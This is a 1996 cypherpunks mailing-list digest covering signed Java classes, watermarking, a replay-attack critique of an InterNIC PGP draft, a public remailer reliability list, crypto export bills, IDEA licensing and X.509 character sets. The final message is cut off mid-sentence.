Date: Mon, 26 Feb 1996 15:42:54 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Java configurability
In-Reply-To: <199602260229.VAA24656@homeport.org>
Message-ID: <Pine.SOL.3.91.960225215340.21721A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Are you subscribed to coderpunks - this sounds very much like the 
SolidOak project on we're working on; this uses embedded singatures to 
authenticate bodies which vouch for the integrity of a class and it's 
referenced sub-classes. The current spec doesn't have dates for expiry in 
there, and doesn't really have versions for referenced classes (needs 
exact hashes), but does support signatures being added by multiple 
authorites at different times. It uses the Dns from the signatures as 
extra keys into the ACL.

I have to demo the currently speced system next week; after that I'll be 
trying to merge the spec with another simiar scheme to give a common 
standard for signed java classes; I'll try and post the spec as it 
currently stands tommorow when I'm at my dragon and can correct a few bits 
that got changed during implementation. 

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave.Birch@eworld.com
Date: Mon, 26 Feb 1996 15:57:24 +0800
To: cypherpunks@toad.com
Subject: How to digitally watermark
Message-ID: <960225233138_25973087@hp1.online.apple.com>
MIME-Version: 1.0
Content-Type: text/plain


>Adam Shostack <adam@homeport.org> wrote..
>Creating watermarks that can't be removed without degrading
>image quality is not especially difficult.  The two tricky bits are
>durability and collusion protection.

I don't know how the scheme in question works, but the general way in 
which these kind of watermarks work is the use of spread spectrum coding. 
So long as you choose a long enough spreading code, you can survive most 
of the information being destroyed in a transform and still recover the 
information.

If a particular transformation (e.g. JPEG coding) stops you from doing 
this, then you pick multiple orthogonal codes (interested readers who 
want to hit the text books could try the key words "Gold Codes") and 
encode after each transform. So, you encode your original TIFF then 
covert it to a JPEG and encode again with an orthogonal code from the 
same family. Since the two codes don't interfere with each other, you can 
recover the watermark however you are viewing the picture.

One particular transformation that a long enough code can withstand is 
scanning a magazine picture. So, you could watermark your picture of the 
Eiffel Tower before selling it to a magazine. Then, when it pops up on 
the Net because someone's scanned it in you can prove that it was your 
picture. What use this is I don't know, since I can't see how you can 
prove who scanned it!

Incidentally, spread spectrum means that you can put several signals into 
the same bandwidth and recover each of them (if you have all of the 
codes). Short codes are used to protect against interference (the NCR 
wireless LAN range uses an 11 bit code, for example) while very long 
codes are used to recover data in situations where the signal falls below 
the noise level (I think I remember reading that the Voyager spacecraft 
used 252,000 bit codes).

I hope someone, somewhere finds this interesting...


-----------------------------------------------------------------
David G.W. Birch                          8 Frederick Sanger Road
Director, Hyperion                           Surrey Research Park
Tel: +44 (0)1483 301793                                 Guildford
Fax: +44 (0)1483 561657                        Surrey GU2 5YD, UK

Where people, networks and money intersect.......Consult Hyperion
http://www.hyperion.co.uk                    daveb@hyperion.co.uk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jasdip Singh <jasdips@genie.internic.net>
Date: Mon, 26 Feb 1996 12:50:49 +0800
To: cypherpunks@toad.com
Subject: Re: InterNIC Guardian Object Draft
In-Reply-To: <199602251334.IAA29519@opine.cs.umass.edu>
Message-ID: <199602260439.XAA24020@genie.internic.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

> > PGP stands for Pretty Good Privacy [2]. The sender will
> > sign the update message with a Guardian's secret PGP
> > key. The InterNIC will verify the received update
> > message with the Guardian's public PGP key. 
> 
> As far as I can see from the draft, the contact update templates do not
> include date or time information. This makes the protocol vulnerable to 
> a simple replay attack. An attacker can record update messages and replay
> them to InterNIC later. 
> 
> Depending upon a Guardian's notification status, this could allow the 
> attacker to confuse things by restoring an old contact information record. 
> Even if a Guardian is using BEFORE-UPDATE, she might not notice that a
> subtle change has been undone. An update notification message arriving on 
> the heels of a similar one might get approved by a Guardian, who chalks it
> up to a mail transport glitch.
> 
> Requiring some sort of timestamp field in the signed portion of the contact
> templates would be good.

I think replay attack is not possible in PGP (unless someone has sender's
private key).

On the receiving end, PGP will decrypt the digital signature using the
sender's public key to get the original hash code (MD5) of the sent
message and compare it with the hash code of the received message
to authenticate the sender.  Once the sender is authenticated, it
 *further* needs to be verified as a guardian for the object to be
updated.  Otherwise, a malicious registrant in InterNIC's public key
ring can update an object it is not supposed to.

Only possiblity is someone capturing a signed PGP message, decrypting
the original hash code using the sender's public key, and then trying
to alter the update message such that it generates the same hash code.
This is highly unlikely since PGP uses MD5 that produces 128-bit hash
code.

-Jasdip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an534772@anon.penet.fi
Date: Mon, 26 Feb 1996 23:51:00 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <31313C53.758B@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


mailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 26 Feb 1996 15:39:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: InterNIC Guardian Object Draft
In-Reply-To: <199602260439.XAA24020@genie.internic.net>
Message-ID: <199602260715.CAA31576@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jasdip Singh writes:
[re: my comments on the InterNIC Guardian Object draft]
> I think replay attack is not possible in PGP (unless someone has sender's
> private key).
[...]

I've responded in detail to Jasdip's message, cc:ed to coderpunks. 
In case anyone else wants to follow along, my mail should make it to the
coderpunks archives at http://www.hks.net/cpunks/index.html within the next 
few hours.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 26 Feb 1996 19:01:52 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Web Browsers and Anonymous Mail
In-Reply-To: <312C161C.7E73@netscape.com>
Message-ID: <31318AC7.7B4B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


lmccarth@cs.umass.edu wrote:
> 
> I wrote:
> # I would prefer not to reimplement SMTP using the Socket class in my own
> # applets. Ideally I'd like to have an applet that presents a form with some
> # entry boxes and check boxes, quantizes and encrypts the input according to
> # the check box settings, and spews the resulting byte streams to the MTA.
> 
> Jeff Weinstein writes:
> >   We do not curently allow Java to get access to our mail subsystem.
> 
> Hmmm.  Can I write an applet that reads form input, processes it, dumps the
> output to an applet window, and tells the user to cut & paste it into a
> Netscape mail sending window ?  That would be a messier solution than I'd
> like, but still decent.

  Forms and HTML pages are not exposed to Java either.  For that you need
JavaScript.  In a future release when JavaScript and Java can talk to
each other you will be able to do what you suggest.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ludwig von Drakenberg III <drake@servidor.dgsca.unam.mx>
Date: Tue, 27 Feb 1996 09:11:05 +0800
To: cypherpunks@toad.com
Subject: CDA Strikes.
Message-ID: <31317B14.8E1@servidor.unam.mx>
MIME-Version: 1.0
Content-Type: text/plain


Read this in http://www.zippo.com/editor.htm.

>                                    So what's the plan....man ?
>
>          So the CDA has come to pass and we need to move on. People will test the
>           constitutionality of bits and pieces of the Telecom Law, a conservative
>           supreme court will find the law valid, or refuse to review it. Things will never
>           be the same. For those who think they will be, or the for the" Don't worry,
>           President Clinton won't enforce the law" crowd, Friday marked the first arrest
>           under the new law. They picked an unsympathetic figure, twice before
>           convicted child pornographer, and got him for illegal data transmission over
>           the Internet. 

>           Next time it won't be such an unsympathetic figure. It will be some ISP,
>           minding their own business, not knowing they have a user that didn't read the
>           rules. They'll spend a year in federal court, defending their postion based on
>           not knowing they comitted a crime. In the end, they will win, but they'll be
>           broke, and out of the business. Won't happen to large providers, too political,
>           and they have the resources to do all of the CDA compliance window decorating.


-- 
Ludwig von Drakenberg III          God *is* the dice of the universe.
drake@servidor.unam.mx             My goddess gave birth to your god.
Facultad de Ciencias, UNAM                  Fuck the CDA

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzExbCgAAAEEAONJqT5AeaOg29oT2WXzpgkMQ/BxZXCiduJsOAWRRIPlkOQc
7RN2ooQKJmvHamhoaXktoIbmpK3fkPoEt4OONDtncmOKQKKKl9BgifUW9lO1msRp
W0WIGZ9wTlX/1j6RTcdAEEWqWlBi4xz8A7a3MJdoIANPOV1Zs6HEQwyN9No5AAUR
tCpFZHVhcmRvIEVzY2FsYW50ZSA8ZHJha2VAc2Vydmlkb3IudW5hbS5teD4=
=nmxM
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 26 Feb 1996 23:47:14 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199602261450.GAA03172@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 26 Feb 96 6:47:14 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nemesis  remailer@meaning.com                  *-*-*+*    24:07  99.98%
nymrod   nymrod@nym.alias.net             +--+*--**+-*    24:58  99.98%
vegas    remailer@vegas.gateway.com            #***#+#     4:32  99.97%
portal   hfinney@shell.portal.com         # ####*###*+     4:09  99.94%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    37:05  99.93%
treehole remailer@mockingbird.alias.net   --+++--+-+-*  2:32:56  99.93%
ecafe    cpunk@remail.ecafe.org           *###**######      :29  99.87%
alpha    alias@alpha.c2.org               * +++++*-+*     43:19  99.78%
hacktic  remailer@utopia.hacktic.nl       ************     7:48  99.77%
gondonym alias@nym.gondolin.org           -----------   3:45:02  99.73%
c2       remail@c2.org                    ***++*- +-*-    21:30  99.64%
vishnu   mixmaster@vishnu.alias.net       ----+-- -+-*  1:08:53  99.63%
replay   remailer@replay.com              +***********     5:18  99.63%
mix      mixmaster@remail.obscura.com     -+---.-..--   7:01:31  99.57%
shinobi  remailer@shinobi.alias.net       -++****+****    41:52  99.35%
flame    remailer@flame.alias.net         +++++------   1:55:03  99.28%
gondolin mix@remail.gondolin.org          ----- -----   3:53:23  98.96%
extropia remail@extropia.wimsey.com       -----------   7:55:33  98.87%
exon     remailer@remailer.nl.com              *+*+* -  1:27:17  97.83%
penet    anon@anon.penet.fi               -------.-.-  19:20:55  97.21%
tjava    remailer@tjava.com               # -**###*-##    13:27  96.16%
rahul    homer@rahul.net                  +### +#++#*#     2:52  99.87%
alumni   hal@alumni.caltech.edu           *#*#+**          2:58  47.27%
pamphlet pamphlet@idiom.com                               42:17   0.25%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Feb 1996 03:08:10 +0800
To: cypherpunks@toad.com
Subject: Re: Remember, RC4 is now PC1
Message-ID: <199602261748.JAA20058@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 AM 2/24/96 -0800, jamesd@echeque.com wrote:
>>From now, instead of saying "RC4" let us say "PC1, (formerly known as RC4)"
..
>Every time you say RC4 without saying "Trademark of some bunch of 
>lawyer scum" you theoretically break the lawyer made law.  So let us 
>stop doing it.   Serve them right.

You can always call it "Ron's Code 4" or "Rivest's Code 4" or whatever.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Feb 1996 02:58:03 +0800
To: cypherpunks@toad.com
Subject: Re: Cluelessness V.S. Lack of Knowledge
Message-ID: <199602261748.JAA20062@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:53 PM 2/24/96 -0500, Adam Shostack <adam@homeport.org> wrote:
>	If someone shows up, having read the sci.crypt FAQ and/or
>Applied Cryptography, I think that their questions will be answered
>without flames.  But if people fail to read whats out there, and want
>to be spoon fed, well, thats another matter.

Even if they want to be spoon fed, they'll get a fair bit of tolerance
here, though they'll get pointed at the FAQs and books.  sci.crypt is
another good place.  Everybody's a newbie once; lack of knowledge
is just an opportunity.

It's folks who show up saying "I've got an unbreakable cryptosystem,
nyahh, nyahh, and it doesn't even use any algorithms, and it's so proprietary
you can't see it" that get flamed, and who try to sell snake oil while
claiming it's the hottest thing since pseudo-random number generators.

        [ SERIOUS OFF, NOISE ON ]

Meanwhile, I've got the franchise for Dogbert's Value-Priced One Time Pads,
and if you're Success-Oriented enough to understand Network Marketing, 
I can help you build your downline and Make E-Money Fast.  Just send
three KB of random bits to every email address on the list,
add your own name and the name of your co-conspirator to the bottom,
and send copies to all your security-conscious friends.  Within a few weeks,
you'll have a lifetime supply of one-time pads for all your paranoia needs!

                        random@sales.dnrc.gov
                        padmaster@dockmaster.ncsc.mil
                        cypherwonks@l.d.com
                        procurement@potp.com
                        richelieu@surete.gov.fr
                        stewarts@ix.netcom.com
                        
                                                

                        

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 27 Feb 1996 01:01:25 +0800
To: cypherpunks@toad.com
Subject: WSJ on Crypto Bills
Message-ID: <199602261536.KAA20140@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, February 26, 1996, p. B4.


   New Proposals On Encryption Get Tepid Response

   By Jared Sandberg


   Two bills are expected to be introduced in Congress that
   try to resolve the deadlock between the administration and
   the Internet industry on software encryption, but industry
   executives are lukewarm to the new proposals.

   The two proposals, sponsored by Democratic Sen. Patrick J.
   Leahy of Vermont and GOP Rep. Robert W. Goodlatte of
   Virginia, seek to loosen government restrictions on
   encryption -- mathematical formulas that are used to
   scramble data beyond recognition of eavesdroppers. The
   government prevents the export of strong encryption because
   it hampers its efforts to monitor the actions of terrorists
   and foreign governments. The Clinton administration wants
   to set up government-approved repositories that keep copies
   of mathematical keys for decoding encrypted information, so
   law enforcement officials can decode private communications
   if granted a court order.

   Those policies have met with uniform distaste on the part
   of the industry executives, who say that widespread use of
   strong encryption is essential to the success of electronic
   commerce over the Internet. They argue that the
   administration's export restrictions on strong
   cryptography, determined by the length of the key needed to
   unlock the code, are hurting business abroad where
   competitors can freely offer stronger encryption software.

   Producing a separate weaker version of encryption software
   for foreign markets not only raises costs but is becoming
   pointless because hackers can now access computers powerful
   enough to break the weaker code.

   "The federal government's ideas on encryption are based on
   a situation which may have existed 10 or 20 years ago with
   very little realization of the realities of today," said
   Sen. Leahy. "We're not going to sell our computer programs
   if we have outdated computer technology, especialiy if
   people can buy it in Europe or Asia."

   The two new bills would allow for the export of much
   stronger encryption provided that level of security was
   "generally available." Sen. Leahy's proposal states that
   the key-escrow scheme will be voluntary, and establishes
   rules by which companies rather than government agencies
   would hold the keys for decoding data. These companies
   would be liable for abuse of keys and subject to strict
   procedures for releasing the keys to law enforcement.    

   Though industry executives welcome the bills, they say the
   measures don't go far enough to unshackle high-tech
   companies. Thomas Parenty, product manager at the database
   firm Sybase Inc., said that both bills represent "a good
   start." But by allowing U.S. companies to export encryption
   only as strong as that which is available overseas, Mr.
   Parenty said, the bills won't allow them to innovate and
   produce superior products.

   And putting keys in the hands of third-party companies,
   they say, is still likely to meet industry opposition.

   People familiar with the bills said one motivation is to
   build support for a private version of the key-escrow
   concept, which could be an opportunity for several
   companies who are selling products based on the idea. "It
   would establish the legal framework for their
   implementation to go forward," said James Bidzos, chief
   executive officer of RSA Data Security Inc., an
   encryption-software company in Redwood City, Calif.

   -- Don Clark contributed to this article.

   [End]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Cornick <mark@evol.resnet.jmu.edu>
Date: Tue, 27 Feb 1996 01:16:04 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Export Legislation?
In-Reply-To: <199602252338.SAA25184@pipe1.nyc.pipeline.com>
Message-ID: <199602261540.KAA23078@evol.resnet.jmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


    jya> From: John Young <jya@pipeline.com> Subject: Crypto Export
    jya> Legislation?

    jya> The excerpt below is from the Wash Post article today. Does
    jya> anyone know the status of the Leahy/Goodlatte bills?

    jya>    Industry also is fanning Congress's interest in taking a
    jya> bigger role in the encryption debate. "Without congressional
    jya> interest, the administration has no reason to liberalize
    jya> exports at all," said Becca Gould, director of policy at the
    jya> Business Software Alliance. "This issue is in Congress's
    jya> front yard because it affects the economy" as well as
    jya> U.S. citizens' privacy rights.

    jya>    Sen. Patrick J. Leahy (D-Vt.) and Rep. Robert W. Goodlatte
    jya> (R-Va.) agree. They plan to introduce bills in the Senate and
    jya> House aimed at loosening the restrictions on encryption. "The
    jya> federal government is taking an attitude that's based more in
    jya> the 1970s than in present time," said Leahy in a telephone
    jya> interview.

I haven't seen Goodlatte's legislation, but I can safely say he
doesn't have our privacy rights at heart. Bob Goodlatte (my local
representative) was the CC toadie partially responsible for putting
"indecent" back in the CDA. I don't trust him any further than I can
spit on him.

I'll keep an eye on this. I'm very suspicious of his intentions.

- --mark

==> mark@evol.resnet.jmu.edu * http://evol.resnet.jmu.edu/~mark/ <==
**WARNING** : The preceding message may have been indecent under the
Telecommunications Act of 1996. Young children, the easily offended,
and members of the Christian Coalition should not have viewed it. :)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMTHUSgJ9CGSE+MitAQEwzgP+PEC7EskS+lSTrultrNgPZkp3cTseLC0Q
pttGP2h+e90NhLVhOrcoLqpPP5BMkYR093FkfnkrhFiLyXe/HgzSeGH4i55yfxvy
TvxvmMZg4P+DQ3JpTxu8Vznt/AeJBudGuGDXzH2IXUOhzvihVJ0CKGXtbn4z/5ra
kjosg/mjAbI=
=68jw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Mon, 26 Feb 1996 08:31:53 +0800
To: Mark Aldrich <maldrich@grctechs.va.grci.com>
Subject: Re: Ascom Tech License for IDEA
In-Reply-To: <Pine.SCO.3.91.960223131904.25492A-100000@grctechs.va.grci.com>
Message-ID: <pgpmoose.199602261055.39873@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Aldrich <maldrich@grctechs.va.grci.com> wrote:
  "In the US, ViaCrypt pays the royalties to Ascom for every copy of 
  ViaCrypt PGP shipped.  Users of ViaCrypt PGP have nothing to worry 
  about.  Personal users of MIT PGP in the US also have nothing to worry 
  about because Ascom's published position deals with 'commercial use'. The 
  only people who need to do anything are people overseas using PGP 2.6i or 
  2.6ui in their businesses.  They need to license IDEA from Ascom."

As another data point, I (sitting in Australia)
attempted to buy a licence through the Web page
and encrypted emailed credit card, and in return
received a phone call from Zurich. I was informed
that IDEA was not patented in Australia, and my
attempt to pay was appreciated but declined.

Europe generally has patent coverage I believe.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jueneman@gte.com
Date: Tue, 27 Feb 1996 02:37:11 +0800
To: Alex Deacon <raph@c2.org>
Subject: Re: IA5 String...
Message-ID: <3131DBED-00000001@wotan.gte.com>
MIME-Version: 1.0
Content-Type: text/plain


>>    There was a lot of energy around S/MIME. People are implementing
>> it. Internally, it's pretty kludgely, but it does provide pretty good
>> cryptographic services. (as an aside, my favorite kludge anecdote is
>> the fact that X.509 certificates use an IA5 character set rather than
>> ASCII, so that the @ in email addresses has to be represented as (a)
>> instead).
>
>Wow, is this true?  I dont think so.  The CCITT document I have (CCITT
>T.50) mentions that an @ sign (Commercial at) is a member of the IRV.
>>From what I understand IA5 basically means US ASCII.  
>
>Alex
>

If people are going to criticize X.509, they ought to at least get their facts 
straight, beginning with the difference between Printable String (standardized 
around the time of the IBM 1403 printer with its 48 character print chain) and 
some of the more extended alphabets. In particular, X.500 has been amended to 
include BMPString within DirectoryString, and BMPString is essentially Unicode. 
Now, there may be some who would argue that a 16 bit character isn't sufficient 
to represent every language in the galaxy (Old High Martian may have some 
additional requirements), but as a first approximation it should certainly good 
enough. 

And one of the virtues of ASN.1 is that a compliant implemtnation shouldn't 
have to be concerned with such details as the alphabet that is used.


Bob

Robert R. Jueneman
GTE Laboratories
40 Sylvan Road
Waltham, MA 02254
Jueneman@gte.com
1-617/466-2820

"The opinions expressed are my own, and may not 
reflect the official position of GTE, if any, on this subject."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Tue, 27 Feb 1996 03:50:35 +0800
To: action@eff.org
Subject: R.U. Sirius @ St. Jude at Club Wired
Message-ID: <199602261924.LAA01373@well.com>
MIME-Version: 1.0
Content-Type: text



                    R.U. SIRIUS AND ST. JUDE AT CLUB WIRED
                                       
Electronic Frontiers Forum

   Thursday, Feb 29, 1996, 7PM PST (10PM EST)
   http://www.hotwired.com/club
   or
   telnet://chat.wired.com:2428
   
   
   
   R.U. Sirius and St. Jude were at the cutting edge of cyberactivism
   while editing Mondo 2000, among the first publications to acknowledge
   issues of privacy, cryptography, access, and censorship online. More
   recently they've created The Mutate Project, a spinoff from their
   "anti-novel" How to Mutate and Take Over the World, a semifictional
   work passing revolutionary memes and supporting opposition to whatever
   oppressive forces might serve to clamp down on the Temporary
   Autonomous Zone of the Internet. They'd prefer a full-bore Permanent
   Autonomous Zone.

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                      http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays <http://www.hotwired.com/club>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an44880@anon.penet.fi
Date: Mon, 26 Feb 1996 19:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: "Internet Security: Your Worst Nightmare"
Message-ID: <9602261133.AA11281@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



  tcmay@got.net writes:
   >> Complete with a picture of Freeman standing in front of an American
   >> flag.
   >
   > I haven't seen this article, but I wouldn't hold the cover photo
   > of Freeman draped in the flag against him....I seem to recall a
   > few Cypherpunks similarly draped in the flag in a magazine
   > article!

Yes, but isn't there a fundamental difference here? Cypherpunks are
pushing for the spread of encryption to enhance our personal
freedom. But when the FBI says that "the real solution is through
better technologies such as encryption," they fail to mention that
they wish to restrict personal freedom through such things as
GAK. This is why it is so ironic that he is draped in the flag. "It's
the FBI: crusaders in defense of the first amendment!"
 

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Knowles" <brad@azathoth.ops.aol.com>
Date: Tue, 27 Feb 1996 02:48:33 +0800
To: Alex Deacon <raph@c2.org>
Subject: Re: IA5 String...
In-Reply-To: <3131DBED-00000001@wotan.gte.com>
Message-ID: <9602261219.ZM2468@azathoth.ops.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 26, 11:12am, Jueneman@gte.com wrote:

> >Wow, is this true?  I dont think so.  The CCITT document I have (CCITT
> >T.50) mentions that an @ sign (Commercial at) is a member of the IRV.
> >>From what I understand IA5 basically means US ASCII.  

    [ ... deletia ... ]

> If people are going to criticize X.509, they ought to at least get
> their facts straight, beginning with the difference between Printable
> String (standardized around the time of the IBM 1403 printer with its
